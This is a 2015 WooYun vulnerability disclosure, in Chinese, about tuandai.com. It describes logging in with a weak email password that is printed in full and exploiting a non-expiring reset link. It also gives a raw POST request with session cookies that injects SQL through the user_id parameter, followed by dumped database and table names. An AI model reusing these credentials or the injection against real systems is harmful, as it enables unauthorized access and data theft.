当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110772

漏洞标题:团贷网某处注入+弱口令=外网漫游(附彩蛋)

相关厂商:tuandai.com

漏洞作者: 殺器王子

提交时间:2015-04-28 08:44

修复时间:2015-04-28 14:17

公开时间:2015-04-28 14:17

漏洞类型:账户体系控制不严

危害等级:高

自评Rank:19

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-28: 细节已通知厂商并且等待厂商处理中
2015-04-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

能否为我申请个苹果婊?不充气那种。

详细说明:

1.jpg


wangjing@tuandai.com wj@123
先是弱口令进去了······

3.jpg


随手搜索了一下邮件搜索密码,然后发现是OA系统。
http://school.yinliancn.com

2.jpg


虽然表面上说是半小时内有效,结果我都过了一个月还是有效····
重置了密码··

5.jpg

登陆进去,发现是个伪·OA······略坑略坑
接着发现伪·OA找回密码处存在post注入。
POST /Account/SavePassword HTTP/1.1
Host: school.yinliancn.com
Proxy-Connection: keep-alive
Content-Length: 35
Accept: */*
Origin: http://school.yinliancn.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://school.yinliancn.com/Account/ChangePassword/a8219424-9112-4d0f-a9b3-66bf6f4fcb4c
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=fd2wqsg5cmqhhazkwjlep3ou; .ASPXAUTH=86FC0C8863F13B862F20992DF977DF406053EC45562370D9D25E8EE9D16488ABA69E8A1442401CE32F10471A6C1AC9EE58D0C2D200E8453128625010E1BCDC2EC047288D8F768C608FBEB3907567C03E82B5C787A3C33F7F42F2E8B6F7C3B5764197FC108064AE9C4288997FAFF34B7EF70D8B3D3F8470315AC1BCD92F2497C9CBD43C45A15CBA2EB9D7361ECDA85655; tuandai_school_user_id=jt-0258; tuandai_school_password=2E3AA277D42027C33E3C7827A2C0AA4F
user_id=jt-0257&password=finger88
user_id参数可注入

4.jpg


6.jpg


8个数据库
可以看到TunDai_OA多么吸引人的裤子啊···
跑表段是个体力活···花了一个小时不到把

8.jpg


10.jpg


接着一边跑注入的时候一边手工猜真·OA的域名,猜到结果为oa.yinliancn.com
然后两个OA应该是公用一个裤子,使用重置密码后的jt-0258账户成功登陆进去

9.jpg


继续···你一定是在逗我,说好的功能呢?
未完待续

漏洞证明:

available databases [8]:
[*] ChatRoom
[*] ChatRoom_test
[*] JT_YYYG
[*] mastes
[*] model
[*] msdb
[*] tempdb
[*] TuanDai_OA
[57 tables]
+-------------------------+
| Log4net |
| sysdiagrams |
| tb_answer |
| tb_banner |
| tb_collect |
| tb_comment |
| tb_course |
| tb_course_dept |
| tb_culture |
| tb_culture_tag |
| tb_dept |
| tb_email |
| tb_exam |
| tb_exam_detail |
| tb_examination |
| tb_file |
| tb_ip_address |
| tb_last_comment |
| tb_leave |
| tb_leave_attachment |
| tb_leave_type |
| tb_level |
| tb_login |
| tb_module |
| tb_module_permission |
| tb_msg |
| tb_nice |
| tb_notice |
| tb_page |
| tb_paperMsg |
| tb_parameter |
| tb_permission |
| tb_recordScore |
| tb_relation_paperMsg |
| tb_role |
| tb_role_permission |
| tb_score |
| tb_share |
| tb_share_type |
| tb_sign |
| tb_sign_all |
| tb_speech |
| tb_subject |
| tb_subject_user |
| tb_tag |
| tb_task |
| tb_tucao |
| tb_user |
| tb_userCenter |
| tb_user_course |
| tb_user_dept |
| tb_user_role |
| tb_workflow |
| tb_workflowApplyDetails |
| tb_workflowNode |
| tb_workflowRole |
| tb_workflow_permission |
+-------------------------+

修复方案:

mask 区域
*****c4b868798a444a67469820.jpg*****


版权声明:转载请注明来源 殺器王子@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-28 14:17

厂商回复:

非常感谢您对团贷网的关注。这网站测试用的,还未正式用。邮箱的问题已经有人提交了,正在处理当中。

最新状态:

暂无